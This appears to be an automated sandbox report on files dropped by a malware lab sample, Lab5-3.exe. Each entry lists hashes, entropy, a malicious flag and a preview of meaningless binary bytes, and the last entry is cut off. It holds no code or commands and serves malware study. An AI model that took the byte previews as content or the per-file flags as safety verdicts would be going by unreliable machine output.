                                                                                                          Preview:.+..bv..3.'...y..1..Q.p..z.V.P.jE.x.*O...V...........l.%..7.r.t..m..$9.:..7.]!|#C....jf..cPL..T.....8DYh..I..I.yd..j......n09......{.5.l.....w].X3u....0.8.z.,..>....c.wK.'.)Hbs......P....6.=.J...<.Z.r...D.'.n......I.v...X.B._:..t.'...>..&.#..7....`..&{......'Y.F.p.....\....(.oA..u..k..1...!.I...!.9..8....k.......#*-..%p."Jm.l..V....A[d....N.|.4.x./x...`.>N.c.{.I...E.T...,...v:....K.!|=.#.....<..@".i...-...'..1..&Y;.#..0E...S.S...&....wS.|....G.NM&F..m(.(F..N.-?-..|._..y..7mb...T>.1}0*......h...-..b!p..+.....mN.r..L..:....\..{...i.....`....3.9.x.? 8..,.U..>......K...AT..x..k.b:O'71.|..%...G.}.f...(.v...~.......EB.2..[.V..z.O0...)......../.e.H..zj......<%.)K..`.4..z..Q.....r...>lL`.......E...3...w^..6BoR.?]2;._t{s...c..O!...b..:8...F.........#.B%.`....w..n.....5.K?.....;mOK.Q..i0...,.G...\./...........n&.8.O.....6..:..b.....7.G$..-_-....,.....%S..".U.R.{...[O......Lh8...77`....!.u.5..?t..{....a.R^.6*.oQ.....&...v.....V.i~..Or7
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5520
                                                                                                          Entropy (8bit):7.968324453418517
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:0vQDRprgkFeC9FXKfmX3laFs800YUGQeN/Qb/FQzneYF1GGx0uKeY2ElUJ:0WRprgk8T03lP80SuzeiF0Cb
                                                                                                          MD5:948BE2ECA4A2FF19BC9C6683EDD96373
                                                                                                          SHA1:FC3CD61EA1CC3BB174C5A0398547099D8C7FDCE9
                                                                                                          SHA-256:160B7CCA2506CBCD4A39BA7BB62008E9D3A5CF6845E5F45BAE3133B467EEBBA7
                                                                                                          SHA-512:00270DB343065C16DD36FA8F0D7E749D909AA6BCFF6822D986939E9E049403553188FF4587E83E6540069A1CAAD5AC4485D857FC177B46A83437517A817F422E
                                                                                                          Malicious:false
                                                                                                          Preview:vF..-...B.;..~...}Z[...0....4=......Q.e5.Mv)SJ...%..._S.2....c..|e..7.....F.j..n.?.w2.9.v5.....y....8....4v~..d[...t..B....A....%r.zm.oP0zP...E.U.!.....of{.m.x.t.....1.'.f.L.....wX.....m'....~..?.y.....GP.hu.*...l~...pJp.....M.$q.T.]...R`K.,..h..[...ej.....D`....+....8F.....E.S.DgJ.ix..*.g....b...gi.v.}..BE.7...t.e.sD.T.Uc.U(**>,H..] .o..[T8.c.5Q{<....5.....B..K.WQ\......Z......-..[..Y?Khy.y%u..G.....3.Rx.|..~E][...H2.....'G....'I..eS..J....V..".'e..X....(BC.&R.......N.-......G..J3.pm......B_9({{7..Y..3.....M...AZ..K.@]@.G.**.m..OI".cF.g.e.\..r&..f.Q...].==.}..y-...K.-..H...W1...........A....k.#3"U....P.q.....\..>. .+P.'W..MvQ....j.m#.Py%...J.k.oKu.N...D....4..`....=.. .c.D.W....^..T.!.Fx.........u...CE.D...v.'D.. ..E.`.+..z...u..~v.o..l.<~!..(<.~k.@x......S..yK....-.4*.......lQ'.Q.@.Q.T.............*...kh.......o.........._......^..A.3.}<.hhMA...J$...qv....%C.2>.I.N.>...V_@.;[..>Ij?.#..o.....t.M..1........r.E....{v.....g\..5.Ek...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11696
                                                                                                          Entropy (8bit):7.981879593073463
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:aA/wGhZHt7w5bduXFpQJr056NYtd8nvZu+jk7DFLjQ5UCrD1qtC/590Cb:x/w0ZHwbCFpQJrzNYtORxk7RLMUeDstg
                                                                                                          MD5:F44D7D361DD55BB435BD487D14C85729
                                                                                                          SHA1:F2040AE2CE6D15FB32896ADF84C0475724474F9D
                                                                                                          SHA-256:D229DED6B4E90DAABE263DED9C4EDAD7626FDE89CB2D7FCDF4E5D11445781B71
                                                                                                          SHA-512:898726F7A71D8A2C194485D953BC1D4D2673AA516440B5A91EE5219ED21F0E1E754BE5BD8AD3AC92CB844191F394A0FAD3E850D6C2A0E1B21EBF2FBFEEC458A7
                                                                                                          Malicious:false
                                                                                                          Preview:0G.QK..P...O.....WR..6.m.m...{......8e.|^..... .....N..!S.M.3.Fb...'oPU...r... ..Nwd..m.._.@I..|....tx............M..2G.....%.".0.O.1..H/w;....O...FBAO....o.sND.\..C..]X...Yr.X....r..2l...U....7.4.G.847cL.WC...v."g..GH.;54.......t.7.5....T....oat..,..`..]....'....)7.G....@ZH....$....M.SF..0./.%.9..C"Sz.M...-..8..w..zN.3M.........@..S..e.j.c.Mj...)....@..'#.tw[..5.k..4lH..S...F..S...V..)..9.F....b...%..).I..........U.b.........2.#..%."7......K;.VD...u........9'..n.q....$.*t.... .c.....?.....I..g.,.c6.o........7.G......o......}.Z.i.x....W...........J...0...6m.....ZtN+pA...,..M...a.$.....=..0.0..g.....Y..?..+."F.8..f.B.c.w...XK....29.GX@...W.mI.....}.p....i....;...(..@.......n.3Abb...Sv...V..(Ku...6..{[..p7d.n9".o0..s. >..*.l..5.2.....rcih....&.:...).\..z..z..B^.#-/..>.w4iV!.~..R.IOG.]..]...PvN.Zf..|....'....vr.......r.hl....O..s.e:..{.......%.0.D.(.E.......Rn.K*@...>7..~y...B.....B.....!..v.2.=.....8../.Z|....V.K.s ..!Q.o.YhX..7..G...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):144176
                                                                                                          Entropy (8bit):7.998696717074076
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:bq4RGakH4PJWc6o+u7ms01OuT6h0sQf1a5lhlYU4UHWQwLnDhA2Z:b1bz+Rz3T6ZQf1a5BF4UCi2Z
                                                                                                          MD5:54B28D18983CB25058A1399B2829910B
                                                                                                          SHA1:5C8FB94EC0788A4527DA45903C4CBCFED50140E9
                                                                                                          SHA-256:C367D1CFC05DCBBBDF34A7FCF49A66455CF75F75B3C57AAD5F810D3353DB80B8
                                                                                                          SHA-512:9B465254850628467A4D7E63653E4B73428904790AF3566172C69DFC1E5CCEC47DEDD85F1ADA82C18358F9780760CDD0299F4E04EA2C6E09ED62292B13B175BD
                                                                                                          Malicious:true
                                                                                                          Preview:G...T.....0M....M.S.#..,.:.t....W...h.Bn...v2ft-.h.-U.F...Y1.....|{.l].".....Lh..5;.,D..Cm.d....%.F.c0Ee.,...V...]..O.0......C.......'..M.t...~O...eG./J..\...-m.+T.V...._.{..I-..=.!...J:.Qs.#..4*?B..<!m.Q.v{....S%.K{QO..~.@].z.[?...Y.y.].2.......}.a@.I.,.......X7..C..2.u.<z..F..O;..S.j.....I".(........vf.[....G129-Fm....V..).L?.........x....W.... a..&..z.UU.D.o...~*......j.3w.m0G.@.h..w...Y....K..I.j....1.........K.G......H-..}.zL.'.b.....bdn)...Zqz..# .s....."..w.Fs.....I.^.t.n...c].......Q....e..@E.."(.&(_......_.0.l..n...8.v..q......-.i.Nk..<.d`U...R.]"...}_.$.-.Wpv.b.in^...~,/$#.....hsR......;..bQ&I+....m..@oY'..%H.&..$.?l.9a.z..T..ufDR.:$JZCY.(.4P...X...6..l.q.e.w<".`..s...j9W.,E^@.04X0...U>?...Z:_.......fQ{?.c[t.....mTo..=#..*.a..l...fvjXr.....z\]..d.0.E...\....i.d...n..f..........3..e2.D.e..i.....+./..RiG...Z..[w.h..hz.i...JMM.0.O....UG.x{E..I...'..F...`......|....X.8.....W..k.iXYi....e.P..$.D:j.a..r.:..6..G..r#.r.{AJ..p..|\.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3168
                                                                                                          Entropy (8bit):7.943389129163471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uymulVlklDnUv7Q1ymioYC7Zz7Wdd/r9UHfUTid3hBaUoSGFcmeykEdEElU92i:uyFd4CQ1cRSzoGx0uKeY2ElUJ
                                                                                                          MD5:3748218ACBA1F27AD2FEE2550332287E
                                                                                                          SHA1:803B96850433C3F1EAFCDAE24F55FEFD9223F5C3
                                                                                                          SHA-256:AA7907043C2B436B09D6421118DCC42C80D1C42CA3D6978D4089688E260CCB57
                                                                                                          SHA-512:DF6A51AB1A3F43886AFC6013C33A0F40DA014AF6543E98B3A50372BEA613D41239F723EDC8188156F48374AE14979AFF1E76F2F87582840C9FB15DF8CD02BF6B
                                                                                                          Malicious:false
                                                                                                          Preview:.f..h,...JS.......'..4i.S...i....9 ....].:J...m...f.(.,9.QR.CfJ./..`.......y6U.....].}.".O).......C..rT..'p\..r..f..y..J...I....[.......L.7.h...j:L...J._W..=k+.[.......|.....oh..#...C....Z.$.T[.s...w|.>.x....u..wyF ..eZ..X.W...o..}..>......_:V...L...C....y........Z.._R..b.A.B.....T.W..m..`...1....f.{..:k...?MD.]..*?.`.K[h.:..|.C....*'.Ive...$z.2lf.s>..y#..P..L-Q..qn.x!V....x..f.O..RC........iyv..b..i....#.( ...g.=....Qgj}........z..s..X..4c..X.3,..0.b.Q...r.G..Mf.^5Q.\tW(.e..*...q.;..Zx...F..4..#.M....w......& .....:(....H.h...p..8.f:r.zF.7.....9..9nR....2b95hc..~.i.6......x?.x.#.8.5."..~..2.q.;F...N.[o.0..N.......H'...}.RJOp{(.....)-.!..}......c.._.........%......lF"...P....yA... Vg.......4{....#..CE..*j.+.N.b.......yEk.........B...{6.g....m...b.x>.'.x.*%1s&.1....^|B..,.#?#..q .\S3..v...A.s...b...S...+.%...].[Vq.......!..RKL.R._.`..w.<..#..z...(.us&.5.........[=.J+s$...0Y.uk.q<.P+.1.i#iQ.c..0....|...m...._A.v)t;P.....%5...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5680
                                                                                                          Entropy (8bit):7.961311931008707
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ns5Awm2pVgCLeFOpev4f3xt6c4VjQ/N1R4MBUTL/gHJPdJMoCTJexDHGx0uKeY2b:nsbm2sCLeyi4vUMXu+cgh4Je60Cb
                                                                                                          MD5:5F0A81173F0CCFCE0B05828E0813CC47
                                                                                                          SHA1:0DFA1C5A805065071A1D4C67B2FF44F562FC620D
                                                                                                          SHA-256:CB8584642465CBE0FA21247107B1F3E1A6AD2CFFD64E43E21826D89B573A58C0
                                                                                                          SHA-512:251372BDFFE0429F2D38F15CFEC0275271A832FA8AC491791F47D1452E2634A33D41AD6A58E0E97369B5BCB6A854AAED866B080BB05A2F1EC360FCBFC73DC60D
                                                                                                          Malicious:false
                                                                                                          Preview:..)...8..$+..!..-.[..*....~./y.|....9F.....-.^.3.?Q.|..@b;." ..0.sp...E-.....`~Fl.....s..*....Xg..k#.....u.V\..U&k....4...D.<.......Z+/.DK.k..6e...|G..9<.o..._3...B8...K0.eU.!. ..i.....h]..K..I....4n7=....~`w.i..-.._+Gg<W..y}.r. +...7..".4K6^..D......M.W.!.....N 5.o...=...F...a.l)p.n../9H........7.1=j.4....B...(1...4..|...J-..OV.4...e..Gtq.j..v.5.... ..gM....S.y...s...PW..za.9..|....B...?[1....eX|..e.{=..gF...m..bK...../.@^.M.......G.I.@.aOL-..55.5..m..|..y.0.fQ.,.z.O....H.l.?4 ..*{.M.S..gV....T....8.U...M.........m.J...>..q.z...f.................?..z.....................Wm.U....|.....IhV}..'...F..M.f0.....v'....?\b.d..M...].D.K..t.x.=.....3.LL|e_v..I<F.e.......R..B..fU.Y....Q...m.....Z..6..8.|e...l...viy."..M....z.......{.O.+ .Wx.s.@.....R...N.w....>..%-..J.$...?..ts...{...Q..p.At....=.rs.....7.n%#E..+.D..m.#.p}.......:I..Z..n....=:S.#.....mfzC.S....}..9..=<.y$.#.@.............O....u..`...4..W .......S.^...ji..2....C..a.f.....$d..xu.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):69376
                                                                                                          Entropy (8bit):7.997527145794467
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:mqNDTsnmvd2fYJNkpiJ7s3xi4hjStsWLbKao68iZ:m0DTqmvlXkp6jpL+3iZ
                                                                                                          MD5:5A0EBF15701018337057A3F7DEE77AA3
                                                                                                          SHA1:BB1184E469C735F4B081D882DA69C2F7A2A249B1
                                                                                                          SHA-256:C570B4BD429DA07377863E2D5F78EC53FEBD64A3A9F2274D45B50F32F4C37F34
                                                                                                          SHA-512:B5F918CB97F94F51710D7B43378733B86A95EAA829029F76FF6A240BA0D0C3FC2C1A73D640904F4B6E4D7A736D4BD39121C5E8C77636BD34FD2DE73425EB7B3E
                                                                                                          Malicious:true
                                                                                                          Preview:i...9.hM.q:fI...q..p.=W.*.#..z(....c..S..j...XS..'....3aW...........:...<r...I....D.3.~`Z?.V.{{.;N.d..`.z...z=.._..t~....P,~..z.>.=...x.......B...iI.....>.%......#....*.,.Y....k....?.fD.....6$...........R.l~C..y..vA+l...:.b.Y..)...C.x.....-......I.o.t-..m..5.`IM$.nb.f..w.....k.? .l..n8.7..s ....b.{.uY.$&...V\u(5hN..b.O.....t..........v......"..Y..^...#4P....g...........7......v...|$a/...q........z.....ij.]..%a..2.... s....yH..#.:T.O...!3...!..t.Lu....QL..DrR.Z6+.....&w...@`9K1.d..S`......W...EP.FF.>.6...w.2..S%.<....J*.L;V..l...f8...V.."..Ov.dO<.....:gP''...C..>.^.Jf.t^gX)?.>...D0e........|8.Q..-...R.<..X.....{v........f!_...}f../.E9.......D....xFG.Z..../..B1?..W...v..<%M@.....w/..<.sG.b..P+.C....M.j.Hr}.I){...(..............I-X.......A.-..B p.....6.Q.Oew..km.....@.~.).39B..b8W~...say.{.+.g.wZT0}7`5.m.\`E....q............~..9...3h.....7FK..x...[n..h..g.,#..../......l...Z.........r.. .(.9Q.....X.1@r$)9.7>.u.|b<bT.W.........."....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5328
                                                                                                          Entropy (8bit):7.968128130297593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:OO2U1RLEe00i4ik3Sw9UJoM19KpiQ4NKKsl5MOidGkwL7QzcdGx0uKeY2ElUJ:OMLEe005C0UJoM1tQ4NnU5MOKhwL7Q/Z
                                                                                                          MD5:F67CB720A773D0BD56EDF8028EB4745E
                                                                                                          SHA1:9D85D08DDF949AE4861EB799C69C2EA4B8397A28
                                                                                                          SHA-256:6FD1EA969321D948CEA11F384CC6D24B88165249A6445F47C85A152477705B24
                                                                                                          SHA-512:CACE457F86D6539208B03778ABF82DF54A840E935A526D6483676A490BF93635BE97553F0B6B41A3D9E5823265D679663CD7A7EE3394C94CCCBE34476DD7827B
                                                                                                          Malicious:false
                                                                                                          Preview:.00...N.C>}...r...s.v......Q.L.Y..2...c.r.j..@.`.s.....2?....*Ys.mL.i......H>V.c5..Z.U.L.p&.....>.Bq..%.l....o.&`.....w...k....9........\\./.s\.7.g..*R..Y...{U+j*v....x.......2GIu..j....C..$.2&..RZ.x.B...T.%..}ZB...uW......x..W.U.p.."BLA..o....Y....j-..&..Z^..=_D.....%.... .8v..}<.~sG[%.q^..X.......3x.....=..M.B#.&.WZ`.\.kP...w..w.H$g.G....[g..`I.R.qW.G%...4..,..p.V?.WTjJ.....I.........qd./...&w..l......C...;..G.j%..n.Y...0.}D.....?h...Q..@.Y.....B.I...Za...p.o.0m.OCJ.j_&.+.E.-.h.&_..1.hq....(...#..-.r.G9.Q...(.....zO,..U....z]C....&.2.K...6.1.F..uIk..BF7...Yk&.4.%...m...%..w6.i..AS".vq.N.x3w.!w.0`..%.......%f|Z....hF......G..4...M..f..l..SE......*..@..4..V.,K.kYL...N......r.kJ.P.....8.s....=O3C.........+lO.-.0..&&-.}...{f.t..T....'.B.p.J<...+g..x..;..^..r:.............3...7t...L......dK\IRrE....?...Ydb......|.@..C.o?y.......B.a...5..L.E...;..}..J3C;.t.I..._...78..=.|va.....L..A...4S.x.....i.Eb..^..3h.a..].h....<..%]..Vd.......S.*.Qb.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.9260037121567555
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:e3VB951oVs5JHt0X9cwkdcHfUTid3hBaUoSGFcmeykEdEElU92i:eTh5dbGx0uKeY2ElUJ
                                                                                                          MD5:7CD32EF2387D40468E42462C4FF5FFE3
                                                                                                          SHA1:7C58F42B1BB2B1185DB3558D1A1DEEA1DDD2D692
                                                                                                          SHA-256:0000E32D7F1AF3DA43061052D76157B491BB634B444B36FF24180CD1D03E254D
                                                                                                          SHA-512:1586D3603A74C4C931B721546FAD0F03DBA0BB59A5B40CBEB8CCAE620741B6BF4520F3BE4A144278E4515A627A4CA10E5C92DAD79BAFD0659F86710284BA5D32
                                                                                                          Malicious:false
                                                                                                          Preview:.:l........Y...a.2.4-....F...3...Q...c".p...XX.[.Z.:......_."..]>V..:...>...B)..>]u.....L(..#...2N.y.E..|..G....Ba.w[......$.*...k...tG..'...v.#.'^+F.N.5..y..%[|..ax..C.....}m.x.{;q.C.'Y.......g...Oh.[....f.#!U............|h|.....(.9.C?1...Z.......7..&.M...B.Y........./........ok*?s}W. .#vz......;.Vt)-P.(....G..lh..O..H.b..I.'....X#..........jw..$..P`|..?.....+5.hL...>...R..N.....K0.d.%Y8..3..%?.=.H...nG\..C.+.v.c!..V....X....W(F..`.g........4..3..Q,3.r....|.. A..{..m.?.g.2.f.q*...${.J...Y46....T.......3.a<.:a.C.:........(:.~<..?.c..N..2...7-...Q...E..H.z.$.#p.4.G...<.i....'.##W7....,.J..0.z...c..i<.o.{]9S.>..F.........A....qG..._.h%.j/.F.b.3.Svn...C...T.....IW.hS..Q..M..P....#....]..j.8....Cc.......OK:..=......j....e.. ....D..E....-.|).h#..y..i..r'ye..E..."G.m..V.<~2L'.B..a.j..fl..8.AC.4.k~.e...Y.$.S6t:7k.-..../.K)..U.\.9......Zr...3~...{.D.{.t>..x.r<... .......H.T.rz.^.R..n.~9...X:._.n. ..q[..P...Pi.9...HG.%..0...%........{uZ{.Snr.2..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4880
                                                                                                          Entropy (8bit):7.9562619108392445
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ESAwdTmwFhWhM/em4kJviZI0nE1FGx0uKeY2ElUJ:Lhvho2F10I0n4e0Cb
                                                                                                          MD5:B043C7003231106B827EC87F7135E459
                                                                                                          SHA1:3BF60A4598BE847FFC0F66C533FBE2C7DC27F69B
                                                                                                          SHA-256:76D3DF6F7ABFBD7E86C033A504AD2D46F1C366B2247B4A17C6B2B9E2F69348DA
                                                                                                          SHA-512:B0FA69838359C407CC2FC37C0008B795C34CC5B5239D79339E895EC3BB8FA22DAB642E6E012F322D69FD64095CED23E4EE9E0099218EE994F7F494788B52FBA4
                                                                                                          Malicious:false
                                                                                                          Preview:...z`.44X7{..q......N!.5;.'.X+....o{.2u.m...:..!..3..{.]...<.+`..5by.@..o.b..kmnz......#.....ID@.:.yZ1\.m_A..../..a..._...>B...W!&...(+..(czw.j..H..:..I7.......i.."U.7W6..C.O.g.L...G.q%.[.;....Z"2.E.K._,...V;J..1..d....../_8.'..2...+..>2p2...9.o....I..jN..,?./t.k......8...s.......T.. ..yf$yf.b..U..h.l.S....A.*7...[V....Q.]#C...X..50\..{.{6_..N...e...w.&..o}a.p.=..!.TD....4|...D..C,.^...f..}.......(.;9....>.zx...%t..Eb..7D3=..E...&..?.P...|..F..........q.@.$..~n.....I.n..s.-.L.\^....w..j%...0..-.kl.......$.O.M.^).^O.>.N.C.........-.)h..K%.x/Xl...l..|.......g.....9PqY....tW.&.}..>.(.....?.[.6S..8..8..pNu/d..nh.N.v5G+.#>.zax.BVN..J.(.._K.}...4..Y..9R../..!..*.rk,...$..W.....l...5`Yz..ea...+.r@.S.e8.k.9..|.z.@.@.x.c..'......P...G..!...*...`.w.....V..SX...G.a....w...Sn...J.B....TBq..)cm....o.*.?..{.l.....+..'.O..o......2...H.8gE.-.....]1.L....i..?.^N.k~.........~M..HXY..X...V.V....: 1.......J.. .....a...e0..t....7......V.Z6.....".@....f.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.936474054710577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dqqY6572Z6Rv/a3qld8dRNkLag+3x7YZQ+JmyzRHfUTid3hBaUoSGFcmeykEdEE+:dzYnUx/a6ly3kLag0x7a+Gx0uKeY2Elk
                                                                                                          MD5:9FEBDDAA7887CA1DA192161C04A6461B
                                                                                                          SHA1:2E3B84548195FE3891D6BC750FADFA458A0D6BD0
                                                                                                          SHA-256:7E90F36E0A23115F97CFB7BEAD2D542CD96C1740F86CE3A7C5B220FB1F3734C8
                                                                                                          SHA-512:292747A2171897696668C5CDFAC546FA0488F17AE973201ED26FAC9B1401E6A8119377DDE8CBEC1B056029150096A8E5C32C831816A7C3E8070FC779A271AA95
                                                                                                          Malicious:false
                                                                                                          Preview:...G.........)....b...g..S.:.wv....-.s.Ud.......p4EI..j..%./Y......)%...U.*..s...mI.P.O...Q.k.......i./".'N....~b~..V.1.q.r3.......3....z|.EO.1&.*..y../BF+....L&...r...q.9R...be.cM.....g..u]..R5...Q.H.7...9.....*9.y..0.".........``WJ.~...L...p....9.....9...%.7...O.).STQ.'..Z.E,.o...g...dk$..u.,..&..F.m....n]..3$.UX.....O..l.#.."....Tn..~..D.L.}...2c......s....w..Y.{.K...g_..#...b..:....OJ:^.o^L....7...J.v(....X...d0...q7..dy.{/..`.-iW.&o.=?....&.....OU~3.G..Z....\.G...w..Y....C&..$.b~..^.W=.....3.@.H.....0DkQz.g...E..aq..h\..P......m..lyz*...WX...fk.D<y.j^K..v9b .....p.......BtI....6._.MTt....[7.C...`v"...qqV....Z.J..T....|.dYJ..b..D...x..Wg.*.c.E.6..........w.WE.......o{4.nP5.-. HYJ....Ja..*l.........T.p....1.R^.....B4.7.U.W.....Y.;.,YT..c...C.a.1D/".e3..>b.c.-...{..mf...7.c.#;..p...6{w|.|~t.......x..e..z..f....".$"..;...x6:..|...'#......^..J.....{1D....^..=.o....t..x.L..d..S..IH(\.^..5.M.E..W.2.x....$....+.8IIN.B.[.bD......0..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.940175750330394
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yVx2WSEpE+tZVsSQR5U/PCHeLaTCWC4UPCHfUTid3hBaUoSGFcmeykEdEElU92i:yVa+tZV1QR5ICHJJUP9Gx0uKeY2ElUJ
                                                                                                          MD5:5819FF25DC8B3805814C875AAC8318E1
                                                                                                          SHA1:09783C4D1AF657982C3A9A50101E4A34C9CDB72F
                                                                                                          SHA-256:9A772E4EB3F84FF52D6C28BF19D76FC546ABC85A859334038FB421AA9CDDE735
                                                                                                          SHA-512:18139A1A8F163B88A4587008A965789457C2B9A9DD72EBEC29A9659F8B20CC46CCE3BC568135490117F375E548EF2E81BA5EB8A3AD0E258E8DEEB39FECCE1B24
                                                                                                          Malicious:false
                                                                                                          Preview:...w.5s_yi....]sJ.US...............'...c.d..d..C..f.....1.U.m....`....q...ym...pi....dnF.Q]W..c.QCU.5.K..._.#....x...H..b..........[h.....s...IL.\>....Yt1..B.M...W..~p.j3.....-d.....f....Fv`?3....X..^.io..!.P.......... ..".9.......QAEE@R|......p9..N.l...Hwb....Id...w[......:.......B.r'.Gd|g.......1xB.....@...Xj.....v...f.N.2.&|...OK.BV..8.^y%.8....&V.k...0)t......F..L.....T..]...z....R..JT.X/D..3......~...M3r.....l?.......].....W....0...A.{.;$`..`.D.....&I1d|..{.......g..L...ey..V......&.7.....\.zzk2.v.I.Y7..$y....*a.r..p.`.7....r..*..N_.v$}a.......x.........*kc....).rj$.`..!:)o.9.....X!.'d<k........V..Z.....fc.+)`<.....%#6...A6....k..:.o.,.......K.<..F...5m}6.S?.....,.....7..H...u..H.q..P...'...X......OY...~....r......Z...`..4G.uz^d...:...R.......X8/...,Su(..bR....]\..-.>_..u.P.eN..U.^.?....K.N.W..qx.....:m'p..P.#`/..J....i.......|..@...D..F../.x...L..1.`...H...E...X.9.n.~\...........,.%.B..c.9..A..{ ..d...7.....l..1vv.%.X.#...k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.937277896725037
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hMUED5G3sIicJV/DrMsDUobvoNGQWcwbP8GbCI8HfUTid3hBaUoSGFcmeykEdEE+:HED5ysxMBrNbgUY/gCMGx0uKeY2ElUJ
                                                                                                          MD5:2E324AB9E700D2C27A540A14CF4A3D4D
                                                                                                          SHA1:C07E98092F8566FE90F0C9147D253059022379CE
                                                                                                          SHA-256:57D849BD297A587043B9B3BCE0CE7F2F70B6861EEE080AF811D78B0E2FF2F44A
                                                                                                          SHA-512:FCB82F64E56BFA91D0A34EB69569B53A3F7310C39EEB7196DB2E6FB01FB105CFAEACBF36DFC139E781BFDBC75AEAE98F32488003C150B1BE89ACEFB8B4B4A050
                                                                                                          Malicious:false
                                                                                                          Preview:t4.9..+.....]#.A..].J&_/g..Vir.1..>Ih..O......^g.0>..U....8.T...a...Q.X......_......on@.'\...Y{.k...../..H..9...@`..<....4Ss.[.C..0.KL......sV....q..;..*...Hd....f.g..I.|u....F.G".......H-!......x'..K...#F...'.....?..V..}...Q.A.U.6;Nk..{.........ko.I.....Xev...%..%i...>x......KL,....v....e....k.Y...L.3..Q...*.7.x.&....X9..rz......g..W.....F.....v..<.},..<.f..^".`.X.K..A........_.L.P...lk.r]@+...O.....?.Q.a.e..:.x..R....j.[.y...3A.X.ys....p....%.85.@..`..[../..!.......B../..R..@:.."..\[...Q....Z...C1FZT...)...XL.\.w..J.Bv....h...y,]v.|..,....f.P.G.....C.`(...N.U....P.f..y.[`.....,6.....G.b.-.').'.1.*...m.e.S]...6qv1..pru...wA...xyT.^P,.....Y..=.)=..,dR..$..P...VGr(........9....p...=..X..9..e.......(q...d..d.s.m..O..d.g^.....l..&....e..B.e._;.Q....Z3A...^....)}..... ......d....A.Ye..$...BZ.T....c*...10........"m.0&D.N.;/..dM......EF.......+...2Zkg.;..VH.Z3.U./.Yat./.>...j.h.$!....&VE.W../)y.P.:.d...U..;s...qf......z..$...hO.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.946260518876035
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KrbLzis67d1J2PXQvQywTORlgWqf5yKhy5HfUTid3hBaUoSGFcmeykEdEElU92i:KrmT7d1JW6QTqOpA6Gx0uKeY2ElUJ
                                                                                                          MD5:0D27A65C568C8C52171306EC9E7F435D
                                                                                                          SHA1:09CF3B2CB228F8275E91879C48E5CD1CCB93D86E
                                                                                                          SHA-256:99029B39AC67EB6BEE2465B396BE5357389BDD4FED4A78928733D8F28D227524
                                                                                                          SHA-512:F2EB659692C25C3B44B7C3CFE7647CBE78CF838A2F65194F503DE3E194D233954124D7EE172FFB9D62AB4995D878633852C93DA97E65A3442188E7C87A4E5912
                                                                                                          Malicious:false
                                                                                                          Preview:...8..m..x..^..9.l...o:.I..Ya.ZMu.......% |../.ON_!._...M3.(..u...>.{:}..R':....D........33.....<.}.f~.O....u7k..D.....E....A..s.?L.N..F..9....G...}a....M.F.+.xh.,K..LJ...s....tl5...^B..9.y$.....V,.].[2.xt...-..+.3...6.@.......#8T.m.fi...u..j.6v..*.>..._...o.L...L.b.&=.H>.(m.y..{C 2&..#w.%.dY.{.#......8F| ..4..U.e..He..T.aq..e|,..k!..C..!'Qn..{..P.4@d6...w....Q.k.5.jf.........h........1p...C.%.H|.'mo.....}......S..'.xo..ae.....q.o..P.v.p.e.....@.f.F'.e.T.s$....a.8...{d...)C...E.]..[....6.\..a..{....&0.$eFr...S._E..7.X...M{.......UL...Uv!.o..h..C..:Bs..%... ..........).T.......&...<..+......a0R..... .kK.<.d....V.~,,..!......F..N...B{.8..P#.G...w-....]R.,w$....hr.......>^."y.*7.....M~.[?....W....=k....._o.;.g$.d......Kz).*..}..M}..D..T....r...@.rt.78.....P)LtG4b.c.0..........*nry./B.g..?.(g........r...;..p....Q..T....7#aN0.Sa.....Ca.m.|;..^...3.x..c.....f.e.(.{...x.,H...lQN...3.....=.....6..b6.v<.+..T..^.......V.m.VN\Y.?V..)`xW..T`....|.r..(F...........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2880
                                                                                                          Entropy (8bit):7.936808774776904
